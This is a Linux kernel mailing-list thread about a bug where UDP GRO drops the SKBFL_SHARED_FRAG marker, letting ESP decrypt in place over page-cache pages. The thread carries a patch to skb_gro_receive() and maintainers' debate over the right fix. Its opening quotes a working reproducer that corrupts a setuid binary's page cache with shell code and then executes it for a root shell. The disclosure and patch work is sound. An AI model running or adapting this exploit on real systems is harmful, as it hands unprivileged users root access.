msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) }; > uint32_t op = ALG_OP_ENCRYPT; > struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); > cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; > cm->cmsg_len = CMSG_LEN(sizeof(op)); > memcpy(CMSG_DATA(cm), &op, sizeof(op)); > int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC); > if (ofd < 0) die("AF_ALG accept"); > if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send"); > if (read(ofd, out, 16) != 16) die("AF_ALG read"); > close(ofd); > } > > /* > * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM > * ciphertext starts at frag byte 0. The target byte is at CTR position 0. > */ > #define KS_POS 0 > > static uint16_t stream_nonce[256]; > static bool stream_have[256]; > > static void build_stream_table(void) > { > struct sockaddr_alg sa = { .salg_family = AF_ALG }; > strcpy((char *)sa.salg_type, "skcipher"); > strcpy((char *)sa.salg_name, "ecb(aes)"); > int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0); > if (fd < 0) die("AF_ALG"); > if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind"); > if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key"); > > unsigned int count = 0; > for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) { > unsigned char iv[8], cb[16], out[16]; > memset(iv, 0xcc, sizeof(iv)); > store_be32(iv + 4, nonce); > memcpy(cb, &xfrm_key[16], 4); > memcpy(cb + 4, iv, 8); > store_be32(cb + 12, 2 + KS_POS / 16); > aes_ecb_block(fd, cb, out); > unsigned char b = out[KS_POS % 16]; > if (stream_have[b]) continue; > stream_have[b] = true; > stream_nonce[b] = (uint16_t)nonce; > count++; > } > close(fd); > if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); } > } > > /* ---- main ---- */ > > int main(void) > { > setvbuf(stdout, NULL, _IONBF, 0); > > printf("[*] uid=%d euid=%d gid=%d egid=%d\n", > getuid(), geteuid(), getgid(), getegid()); > printf("[*] 
mode=gro_espinudp_pagecache_replace\n\n"); > > struct stat st; > if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN) > die("stat target"); > > printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size); > > build_stream_table(); > printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS); > > /* > * Fork before entering the user namespace. The child enters the > * user/net namespace and does all the page-cache corruption. The > * parent stays in the init user namespace so that execve() of the > * corrupted setuid su binary honors the setuid bit, giving a real > * root shell rather than a fake namespace-root shell. > */ > fflush(stdout); fflush(stderr); > pid_t worker = fork(); > if (worker < 0) die("fork worker"); > if (worker > 0) { > int wstatus; > waitpid(worker, &wstatus, 0); > if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) { > char *argv[] = { (char *)target_file, NULL }; > char *envp[] = { NULL }; > execve(target_file, argv, envp); > } > return WIFEXITED(wstatus) ? 
WEXITSTATUS(wstatus) : 2; > } > > /* Child: enter user namespace and do the corruption */ > if (getuid() != 0) setup_userns(); > if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); > if_up("lo"); > create_veth(); > > int p_ns[2], p_veth[2], p_rdy[2]; > if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe"); > fflush(stdout); fflush(stderr); > > pid_t rx = fork(); > if (rx < 0) die("fork"); > > if (rx == 0) { > close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]); > if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); > if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)"); > mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL); > mount("sysfs", "/sys", "sysfs", 0, NULL); > sync_write(p_ns[1]); close(p_ns[1]); > sync_read(p_veth[0]); close(p_veth[0]); > if_up("lo"); > ethtool_set(VETH1, ETHTOOL_SGRO, 1); > if_up(VETH1); > enable_veth_napi(VETH1); > add_addr(VETH1, ADDR_DST); > add_sa(); > int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (ufd < 0) gate_fail("socket"); > struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > inet_pton(AF_INET, ADDR_DST, &ba.sin_addr); > if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind"); > int et = UDP_ENCAP_ESPINUDP, gro = 1; > setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et)); > setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro)); > sync_write(p_rdy[1]); > pause(); > _exit(0); > } > > close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]); > sync_read(p_ns[0]); close(p_ns[0]); > move_to_netns(VETH1, rx); > sync_write(p_veth[1]); close(p_veth[1]); > if_up(VETH0); add_addr(VETH0, ADDR_SRC); > ethtool_set(VETH0, ETHTOOL_STSO, 0); > ethtool_set(VETH0, ETHTOOL_SGSO, 0); > > /* > * Add a netem delay on the sender veth so both datagrams sit in the > * qdisc until the timer fires, then get released into veth_xmit() > * within the same softirq context. 
This guarantees both land in one > * NAPI poll cycle for GRO to merge them, without needing sysfs > * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the > * init namespace). tc uses netlink with ns_capable(), so it works > * from a user namespace. > */ > if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0) > gate_fail("tc netem"); > usleep(50000); > > sync_read(p_rdy[0]); close(p_rdy[0]); > > int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (sock < 0) die("socket"); > struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr); > inet_pton(AF_INET, ADDR_DST, &da.sin_addr); > bind(sock, (struct sockaddr *)&sa, sizeof(sa)); > connect(sock, (struct sockaddr *)&da, sizeof(da)); > > int target_fd = open(target_file, O_RDONLY | O_CLOEXEC); > if (target_fd < 0) die("open target"); > > uint32_t seq = 1; > size_t total_changed = 0; > int delay_ms = 20; > int sleep_us = 40000; > struct timespec last_ok; > clock_gettime(CLOCK_MONOTONIC, &last_ok); > > printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN); > > /* Warmup: send a dummy pair to prime the netem/NAPI path */ > { > unsigned char w[16 + SPLICE_LEN]; > memset(w, 0, sizeof(w)); > store_be32(w, ESP_SPI); > store_be32(w + 4, seq++); > send(sock, w, sizeof(w), 0); > store_be32(w + 4, seq++); > send(sock, w, sizeof(w), 0); > usleep(sleep_us); > } > > for (int pass = 0; ; pass++) { > size_t pass_changed = 0, remaining = 0; > > for (int idx = 0; idx < PAYLOAD_LEN; idx++) { > unsigned char cur = read_byte_at(target_fd, idx); > if (cur == shell_elf[idx]) > continue; > remaining++; > > unsigned char need_ks = cur ^ shell_elf[idx]; > uint16_t nonce = stream_nonce[need_ks]; > unsigned char iv[8]; > memset(iv, 0xcc, sizeof(iv)); > store_be32(iv + 4, nonce); > > unsigned char hdr[16]; > char hp[] = "/tmp/fgro-XXXXXX"; > int hfd = 
mkstemp(hp); unlink(hp); > store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++); > memcpy(hdr + 8, iv, 8); > write(hfd, hdr, 16); > > int pfd[2]; > pipe(pfd); > loff_t ho = 0; > splice(hfd, &ho, pfd[1], NULL, 16, 0); > loff_t so = (loff_t)idx; > splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0); > close(hfd); > > unsigned char p1[16 + SPLICE_LEN]; > store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++); > memcpy(p1 + 8, iv, 8); > memset(p1 + 16, 0x41, SPLICE_LEN); > send(sock, p1, sizeof(p1), 0); > > int cork = 1; > setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); > splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0); > cork = 0; > setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); > close(pfd[0]); close(pfd[1]); > > usleep(sleep_us); > > unsigned char got = read_byte_at(target_fd, idx); > if (got == shell_elf[idx]) { > total_changed++; > pass_changed++; > clock_gettime(CLOCK_MONOTONIC, &last_ok); > printf("\r[+] byte %3d/%-3d 0x%02x -> 0x%02x ok (%zu changed)", > idx, PAYLOAD_LEN, cur, got, total_changed); > } else { > printf("\r[-] byte %3d/%-3d 0x%02x -> 0x%02x (want 0x%02x) MISS", > idx, PAYLOAD_LEN, cur, got, shell_elf[idx]); > } > fflush(stdout); > } > > if (remaining == 0) > break; > > size_t still_wrong = 0; > for (int idx = 0; idx < PAYLOAD_LEN; idx++) > if (read_byte_at(target_fd, idx) != shell_elf[idx]) > still_wrong++; > > if (still_wrong == 0) > break; > > struct timespec now; > clock_gettime(CLOCK_MONOTONIC, &now); > long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 + > (now.tv_nsec - last_ok.tv_nsec) / 1000000; > if (elapsed > 30000) { > printf("\n[!] %zu bytes stuck after 30s without progress\n", > still_wrong); > break; > } > > if (delay_ms < 500) { > delay_ms = delay_ms < 250 ? 
delay_ms * 2 : 500; > sleep_us = delay_ms * 2000; > char cmd[128]; > snprintf(cmd, sizeof(cmd), > "tc qdisc change dev " VETH0 " root netem delay %dms", > delay_ms); > system(cmd); > } > printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n", > pass + 1, pass_changed, still_wrong, delay_ms); > fflush(stdout); > } > > close(target_fd); > close(sock); > kill(rx, SIGTERM); > waitpid(rx, NULL, 0); > > /* Final verification: count how many bytes match shell_elf */ > int final_fd = open(target_file, O_RDONLY | O_CLOEXEC); > size_t matching = 0; > if (final_fd >= 0) { > for (int i = 0; i < PAYLOAD_LEN; i++) > if (read_byte_at(final_fd, i) == shell_elf[i]) > matching++; > close(final_fd); > } > > printf("\n\n"); > if (total_changed > 0) { > printf("VULNERABLE: %zu/%d payload bytes now match shell_elf " > "(%zu written via GRO flag-strip)\n", > matching, PAYLOAD_LEN, total_changed); > _exit(1); > } > > printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN); > _exit(0); > } > From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001 > From: Sultan Alsawaf <sultan@kerneltoast.com> > Date: Wed, 13 May 2026 21:47:51 -0700 > Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive() > > skb_gro_receive() moves frag descriptors from the incoming skb to the > GRO accumulator through two frag-transfer paths (the direct frag-move > loop and the head_frag + memcpy path) without propagating the > SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a > result, the accumulator ends up holding references to externally owned > or page-cache-backed pages while reporting skb_has_shared_frag() as > false. > > This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net: > skbuff: propagate shared-frag marker through frag-transfer helpers"), > which fixed the identical omission in __pskb_copy_fclone(), > skb_try_coalesce(), and skb_shift(). 
skb_gro_receive() was missed in
> that fix since it lives in net/core/gro.c rather than net/core/skbuff.c.
>
> The impact is observable through ESP-over-UDP with UDP GRO: splice()
> attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via
> ip_append_page(). When two such datagrams are GRO-merged via
> skb_gro_receive(), the flag is dropped. After udp_rcv_segment()
> re-segments the merged GSO skb, the fresh segments carry the
> page-cache frags without the shared-frag marker. esp_input() then sees
> !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast
> path, decrypting in place over the page-cache pages. Because AES-GCM
> CTR decryption runs before the authentication tag is verified, the
> page cache is corrupted even though the tag check subsequently fails.
>
> Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the
> accumulator in both frag-transfer paths, matching what the skbuff.c
> helpers already do. The third path (frag_list merge at the "merge:"
> label) chains the entire incoming skb onto the accumulator's frag_list
> without moving individual frag descriptors, so each sub-skb retains
> its own flags and no propagation is needed there.
>
> Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> Cc: stable@vger.kernel.org
> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
> Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com>
> ---
>  net/core/gro.c | 4 ++++
>  1 file changed, 4 insertions(+)
>
> diff --git a/net/core/gro.c b/net/core/gro.c
> index 31d21de5b15a7..4ac41ced13aeb 100644
> --- a/net/core/gro.c
> +++ b/net/core/gro.c
> @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		skb_frag_off_add(frag, offset);
>  		skb_frag_size_sub(frag, offset);
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		/* all fragments truesize : remove (head size + sk_buff) */
>  		new_truesize = SKB_TRUESIZE(skb_end_offset(skb));
>  		delta_truesize = skb->truesize - new_truesize;
> @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags);
>  		/* We dont need to clear skbinfo->nr_frags here */
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff));
>  		delta_truesize = skb->truesize - new_truesize;
>  		skb->truesize = new_truesize;
> -- 
> 2.54.0
>
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
2026-05-14 6:18 ` Sultan Alsawaf
@ 2026-05-14 8:04 ` Paolo Abeni
2026-05-14 9:38 ` Hyunwoo Kim
1 sibling, 1 reply; 6+ messages in thread
From: Paolo Abeni @ 2026-05-14 8:04 UTC (permalink / raw)
To: Hyunwoo Kim, kuba, steffen.klassert
Cc: netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing,
herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern, Sabrina Dubroca

On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> skb_shinfo()->flags when moving frags from source to destination.
> __pskb_copy_fclone() defers the rest of the shinfo metadata to
> skb_copy_header() after copying frag descriptors, but that helper
> only carries over gso_{size,segs,type} and never touches
> skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> descriptors directly and leave flags untouched. As a result, the
> destination skb keeps a reference to the same externally-owned or
> page-cache-backed pages while reporting skb_has_shared_frag() as
> false.
>
> The mismatch is harmful in any in-place writer that uses
> skb_has_shared_frag() to decide whether shared pages must be detoured
> through skb_cow_data(). ESP input is one such writer (esp4.c,
> esp6.c), and a single nft 'dup to <local>' rule -- or any other
> nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> skb in esp_input() with the marker stripped, letting an unprivileged
> user write into the page cache of a root-owned read-only file via
> authencesn-ESN stray writes.
>
> Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> were actually moved from the source.
skb_copy() and skb_copy_expand() > share skb_copy_header() too but linearize all paged data into freshly > allocated head storage and emerge with nr_frags == 0, so > skb_has_shared_frag() returns false on its own; they need no change. > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need additionally/instead a follow-up similar to the one mentioned by Jakub here: https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/ /P ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
2026-05-14 8:04 ` Paolo Abeni
@ 2026-05-14 9:38 ` Hyunwoo Kim
2026-05-14 10:21 ` Sabrina Dubroca
0 siblings, 1 reply; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14 9:38 UTC (permalink / raw)
To: Paolo Abeni
Cc: kuba, steffen.klassert, netdev, stable, mhal, davem, horms,
edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen,
ben, dsahern, Sabrina Dubroca, imv4bel

On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > skb_shinfo()->flags when moving frags from source to destination.
> > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > skb_copy_header() after copying frag descriptors, but that helper
> > only carries over gso_{size,segs,type} and never touches
> > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > descriptors directly and leave flags untouched. As a result, the
> > destination skb keeps a reference to the same externally-owned or
> > page-cache-backed pages while reporting skb_has_shared_frag() as
> > false.
> >
> > The mismatch is harmful in any in-place writer that uses
> > skb_has_shared_frag() to decide whether shared pages must be detoured
> > through skb_cow_data(). ESP input is one such writer (esp4.c,
> > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > skb in esp_input() with the marker stripped, letting an unprivileged
> > user write into the page cache of a root-owned read-only file via
> > authencesn-ESN stray writes.
> >
> > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > were actually moved from the source. skb_copy() and skb_copy_expand()
> > share skb_copy_header() too but linearize all paged data into freshly
> > allocated head storage and emerge with nr_frags == 0, so
> > skb_has_shared_frag() returns false on its own; they need no change.
> >
> > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
>
> WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> additionally/instead a follow-up similar to the one mentioned by Jakub here:
>
> https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/

Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is
not a robust direction for the fix. Even minor logic changes elsewhere
could cause the issue to resurface.

As a follow-up, eliminating the in-place handling in esp_input -- accepting
the performance trade-off -- seems necessary. That was actually the
direction of my initial proposal:

https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/


Best regards,
Hyunwoo Kim
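
The trade-off discussed in this message can be illustrated with a small user-space model that contrasts a writer gated on the marker with one that always copies first. This is a sketch under stated assumptions, not the ESP code: `model_pkt`, `model_make_private()`, `model_transform_gated()` and `model_transform_always_copy()` are hypothetical names, and the XOR loop merely stands in for an in-place transform such as decryption.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

#define MODEL_SHARED_FRAG (1u << 1)	/* hypothetical model bit */

/* A packet whose payload may live in a page it does not own. */
struct model_pkt {
	unsigned int flags;
	unsigned char *payload;
	size_t len;
	bool owns_payload;	/* true once the payload is a private copy */
};

/* Replace the payload with a private heap copy; returns 0 on success. */
static int model_make_private(struct model_pkt *pkt)
{
	unsigned char *copy;

	assert(pkt->payload && pkt->len > 0);
	if (pkt->owns_payload)
		return 0;

	copy = malloc(pkt->len);
	if (!copy)
		return -1;
	memcpy(copy, pkt->payload, pkt->len);
	pkt->payload = copy;
	pkt->owns_payload = true;
	return 0;
}

/* Stand-in for an in-place transform of the payload bytes. */
static void model_transform(struct model_pkt *pkt)
{
	for (size_t i = 0; i < pkt->len; i++)
		pkt->payload[i] ^= 0xff;
}

/* Gated writer: copies only when the marker says the page is shared. */
static int model_transform_gated(struct model_pkt *pkt)
{
	if ((pkt->flags & MODEL_SHARED_FRAG) && model_make_private(pkt))
		return -1;
	model_transform(pkt);
	return 0;
}

/* Unconditional writer: always copies first and never trusts the marker. */
static int model_transform_always_copy(struct model_pkt *pkt)
{
	if (model_make_private(pkt))
		return -1;
	model_transform(pkt);
	return 0;
}
```

In this model the gated writer modifies the original page whenever the marker has been lost along the way, while the unconditional writer pays for one allocation and copy per packet regardless of the flag. The caller is responsible for freeing a payload once `owns_payload` is true.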
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
2026-05-14 9:38 ` Hyunwoo Kim
@ 2026-05-14 10:21 ` Sabrina Dubroca
0 siblings, 0 replies; 6+ messages in thread
From: Sabrina Dubroca @ 2026-05-14 10:21 UTC (permalink / raw)
To: Hyunwoo Kim
Cc: Paolo Abeni, kuba, steffen.klassert, netdev, stable, mhal, davem,
horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu,
jiayuan.chen, ben, dsahern

2026-05-14, 18:38:34 +0900, Hyunwoo Kim wrote:
> On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> > On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > > skb_shinfo()->flags when moving frags from source to destination.
> > > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > > skb_copy_header() after copying frag descriptors, but that helper
> > > only carries over gso_{size,segs,type} and never touches
> > > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > > descriptors directly and leave flags untouched. As a result, the
> > > destination skb keeps a reference to the same externally-owned or
> > > page-cache-backed pages while reporting skb_has_shared_frag() as
> > > false.
> > >
> > > The mismatch is harmful in any in-place writer that uses
> > > skb_has_shared_frag() to decide whether shared pages must be detoured
> > > through skb_cow_data(). ESP input is one such writer (esp4.c,
> > > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > > skb in esp_input() with the marker stripped, letting an unprivileged
> > > user write into the page cache of a root-owned read-only file via
> > > authencesn-ESN stray writes.
> > >
> > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > > were actually moved from the source. skb_copy() and skb_copy_expand()
> > > share skb_copy_header() too but linearize all paged data into freshly
> > > allocated head storage and emerge with nr_frags == 0, so
> > > skb_has_shared_frag() returns false on its own; they need no change.
> > >
> > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> >
> > WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> > additionally/instead a follow-up similar to the one mentioned by Jakub here:
> >
> > https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/
>
> Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is
> not a robust direction for the fix. Even minor logic changes elsewhere
> could cause the issue to resurface.
>
> As a follow-up, eliminating the in-place handling in esp_input -- accepting

It would close this group of vulnerabilities, but there are other
parts of the networking stack that consume this flag. For those,
chasing missing flag propagation is still a useful task.

> the performance trade-off -- seems necessary. That was actually the
> direction of my initial proposal:
>
> https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/

But you chose to abandon this approach (I guess because of the AI
feedback Simon forwarded? feedback doesn't necessarily mean "drop this
entirely").

--
Sabrina
Thread overview: 6+ messages
2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
2026-05-14 6:18 ` Sultan Alsawaf
2026-05-14 9:23 ` Hyunwoo Kim
2026-05-14 8:04 ` Paolo Abeni
2026-05-14 9:38 ` Hyunwoo Kim
2026-05-14 10:21 ` Sabrina Dubroca